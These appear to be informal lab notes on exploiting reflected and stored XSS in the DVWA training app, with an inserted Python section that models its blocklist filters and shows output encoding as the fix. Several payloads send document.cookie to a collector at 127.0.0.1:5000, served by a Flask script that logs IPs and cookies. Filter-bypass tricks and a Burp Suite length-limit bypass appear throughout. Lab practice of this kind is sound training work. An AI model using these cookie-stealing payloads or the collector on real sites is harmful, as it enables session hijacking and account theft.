Link: https://github.com/dhgdhg/DVWA-Note

  1. XSS (Reflected)

    • Chrome needs to be started with chrome.exe -disable-xss-auditor first

    • low

      • <script>alert(document.cookie)</script>

      • So cookies can be stolen, hahaha, go!

      • JS

          <script>img=new Image();img.src="http://127.0.0.1:5000/?cookie="+document.cookie</script>
      • Server side

        • Code

            # a.py -- receives the exfiltrated value and appends "<client ip>  <cookie>" to a file
            from flask import Flask, request

            app = Flask(__name__)

            @app.route('/')
            def get_cookie():
                cookie = request.args.get("cookie")  # value passed as ?cookie=...
                ip = request.remote_addr              # client address of the request
                with open('ip-cookie.txt', 'ab+') as f:
                    f.write('{}  {}\n'.format(ip, cookie).encode('utf8'))
                return ''
          
        • Run

          • env FLASK_APP=a.py flask run
      • Nice.

    • medium

      • <script>alert(document.cookie)</script>
      • Returns Hello alert(document.cookie); baffled, where did my script go?
      • Try mixed case: <ScRipt>alert(document.cookie)</ScRipt>
      • Please accept my middle finger, hahahaha
      • <ScRipt>img=new Image();img.src="http://127.0.0.1:5000/?cookie="+document.cookie</ScRipt>
      • Stealing cookies...
    • high

      • <script>alert(document.cookie)</script>

      • Hello >, that's what comes back; not bad

      • Try mixed case <ScRipt>alert(document.cookie)</ScRipt>, hmm, also not bad

      • Try plain script again: Hello script

      • <script: Hello , not bad

      • Then I won't use script at all, how annoying

      • <img src=x onerror=alert(1)>, <iframe onload=alert(1)> Bang!

      • <img src=x onerror=window.open("http://127.0.0.1:5000/?cookie="+document.cookie)> Bang!

      • Top-quality payload:

        • <img src=x onerror=src='http://127.0.0.1:5000/?cookie='+document.cookie>
      • Server-side code

          from flask import Flask, request
          from flask_limiter import Limiter
          from flask_limiter.util import get_remote_address

          app = Flask(__name__)
          # Rate limit per client address so each IP is logged at most once an hour.
          # Keyword arguments work with both flask-limiter 2.x and 3.x (in 3.x the
          # first positional parameter became key_func, so Limiter(app, ...) breaks).
          limiter = Limiter(
              key_func=get_remote_address,
              app=app,
              default_limits=["1 per hour"]
          )

          @app.route('/')
          def get_cookie():
              cookie = request.args.get("cookie")  # value passed as ?cookie=...
              ip = request.remote_addr              # client address of the request
              with open('ip-cookie.txt', 'ab+') as f:
                  f.write('{}  {}\n'.format(ip, cookie).encode('utf8'))
              return ''
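Added example (my code, not from these notes or from DVWA's source): a Python model of the blocklist filters the notes run into at the reflected medium and high levels, next to the output encoding that actually fixes the bug. The two filters are reconstructed from the behaviour recorded above ("Hello alert(...)", "Hello >", "Hello script") and are an assumption about DVWA's checks; the payloads are the ones tried in the notes.

```python
import html
import re

# Blocklist filters reconstructed from the behaviour the notes record.
# Assumption: they approximate DVWA's medium/high checks; not DVWA's source.
def filter_medium(name: str) -> str:
    # Case-sensitive removal of the literal "<script": mixed case walks past it.
    return name.replace("<script", "")

def filter_high(name: str) -> str:
    # Case-insensitive: drops "<" followed by s..c..r..i..p..t with anything between.
    # Defeats <ScRipt>, but any tag without that letter sequence (img, iframe)
    # carrying an event handler still gets through.
    return re.sub(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", "", name, flags=re.I)

def encode_output(name: str) -> str:
    # The actual fix: encode for the HTML text context instead of blocklisting.
    return html.escape(name, quote=True)

def tag_survives(rendered: str) -> bool:
    # Detection heuristic: an unescaped opening tag is still present in the output.
    return re.search(r"<[a-z]", rendered, flags=re.I) is not None

# Constructed inputs: the payloads tried in the notes above.
PAYLOADS = {
    "lowercase_script": "<script>alert(document.cookie)</script>",
    "mixed_case_script": "<ScRipt>alert(document.cookie)</ScRipt>",
    "img_onerror": "<img src=x onerror=alert(1)>",
    "iframe_onload": "<iframe onload=alert(1)>",
}

FILTERS = {"medium": filter_medium, "high": filter_high, "encoded": encode_output}

def evaluate() -> dict:
    # For each filter, the payloads that still leave an active tag in "Hello <name>".
    return {level: sorted(p for p, v in PAYLOADS.items() if tag_survives(f(v)))
            for level, f in FILTERS.items()}

if __name__ == "__main__":
    for level, survivors in evaluate().items():
        print(f"{level:8s} still executable: {survivors or 'none'}")
```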
  2. XSS (Stored)

    • low
      • name: 1
      • message: <script>alert(1)</script>
    • medium
      • name: 1
      • message: <script>alert(1)</script>
        • Nope
      • name: 1
      • message: <ScRipt>alert(1)</SCrIpt>
        • Nope
      • name: 1
      • message: <ScscriptRipt>alert(1)</SCrscriptIpt>
        • Nope
      • name: 1
      • message: <img src=1 onerror=alert(1)>
        • Nope
      • name: <scRipt>
      • message: 1
        • Mm-hm
        • name's maximum length is 10, hmm
        • name: <scRipt>/*
        • message: 1
        • name: 2
        • message: */alert(1);/*
          • Nope
      • Capture the request with Burp Suite, change the length, and see whether the length limit is only enforced on the front end
      • Nice
        • Burp Suite
          • name: <scRipt>alert(1)</scRipt>
          • message: <scRipt>alert(2)</scRipt>
          • message has the script tag filtered, but name doesn't; OK, bro
    • high
      • Burp Suite
        • name: <scRipt>alert(5)</scRipt>
        • message: 6
        • name: <img src=x onerror=alert(6)>, <iframe onload=alert(7)>
          • Duang!